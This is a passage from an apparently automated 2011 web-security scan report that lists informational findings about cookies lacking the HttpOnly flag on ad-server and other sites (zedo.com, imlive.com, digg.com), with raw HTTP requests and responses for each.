ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=128
Expires: Fri, 28 Jan 2011 23:18:50 GMT
Date: Fri, 28 Jan 2011 23:16:42 GMT
Connection: close
Content-Length: 2313

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='appnexus300x
...[SNIP]...

11.294. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.3788897015620023 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:43,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,11,14:951,7,14:826,187,9:951,2,9:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=43:20:19:57:27:29:2:1:1:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=58:30:43:20:19:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1;expires=Mon, 28 Feb 2011 03:21:37 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFgeo=5386156;expires=Sun, 29 Jan 2012 03:21:37 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=114
Expires: Sat, 29 Jan 2011 03:23:31 GMT
Date: Sat, 29 Jan 2011 03:21:37 GMT
Connection: close
Content-Length: 2537

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...

11.295. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=7/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.05526216677390039 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,14:951,7,14;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Sat, 29 Jan 2011 13:40:40 GMT
Date: Sat, 29 Jan 2011 13:39:46 GMT
Connection: close
Content-Length: 4378

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...

11.296. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-401/d3/jsc/gl.js HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0:0; FFcat=1220,167,14:1220,101,9
If-None-Match: "812b9ff1-5d7-4989a5a58d7c0"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:44 GMT;domain=.zedo.com;path=/;
ETag: "81ee0db6-5d7-4989a5a58d7c0"
Vary: Accept-Encoding
X-Varnish: 2233581894 2233581891
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=370269
Expires: Tue, 01 Feb 2011 23:32:53 GMT
Date: Fri, 28 Jan 2011 16:41:44 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

11.297. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1483&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/ADO/iview/278612752/direct;wi.1;hi.1/01?click=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1
If-None-Match: "6ae02bae-7054-4942082502f40"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=749B826,20|1483_759#365;expires=Sat, 28 Jan 2012 21:57:38 GMT;domain=.zedo.com;path=/;
ETag: "199804b-7054-4942082502f40"
X-Varnish: 1435724280 1435712339
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30441
Expires: Sat, 29 Jan 2011 06:24:59 GMT
Date: Fri, 28 Jan 2011 21:57:38 GMT
Connection: close

GIF89a.............!.......,...........D..;

11.298. http://d7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1037004Za883605Zc826000187%2C826000187Zs173Zt128&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:24,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,7,14:826,187,9:951,7,9:951,2,9:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=35:15:52:27:24:16:2:1:1:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1037004Za883605Zc826000187,826000187Zs173Zt128;expires=Mon, 28 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
X-Varnish: 2807523739
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=3419
Date: Sat, 29 Jan 2011 02:23:29 GMT
Connection: close



11.299. http://de.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fhuicq55a4uitj55chpgdhek; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fhuicq55a4uitj55chpgdhek; path=/; HttpOnly
Set-Cookie: spvdr=vd=02b46df6-422e-4d35-8928-ba18aa43474c&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:56 GMT; path=/
Set-Cookie: ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:56 GMT
Connection: close
Content-Length: 18297
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...

11.300. http://de.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rkmzysyclwgu53fp4rzbprzh; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rkmzysyclwgu53fp4rzbprzh; path=/; HttpOnly
Set-Cookie: spvdr=vd=9684388a-c5c4-42d8-b5e6-c1e641451a87&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:00 GMT; path=/
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KxmFzWluv%2bqbh0c3oiJmLUSD%2bKjuVH%2fV%2fFOKPYPY2Il6OwS7pKLUz42XL5yLZkKZLHLspvyKtn%2bTkr%2f9rrIzLtQ%3d%3d; path=/
Set-Cookie: pde=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:00 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:00 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.301. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...

11.302. http://dk.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=nn1y4duqur04onbqzv5cab45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nn1y4duqur04onbqzv5cab45; path=/; HttpOnly
Set-Cookie: spvdr=vd=6b4ad7c2-4fe9-446c-bd92-1540c020264b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:06 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:06 GMT
Connection: close
Content-Length: 17878
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...

11.303. http://dk.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=wylfhkil3zhhhp45ddkune3b; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wylfhkil3zhhhp45ddkune3b; path=/; HttpOnly
Set-Cookie: spvdr=vd=4e212482-52e8-4a45-bf18-fce81b449003&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:07 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pdk=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:17:07 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:06 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


11.304. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11170717655@x23

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

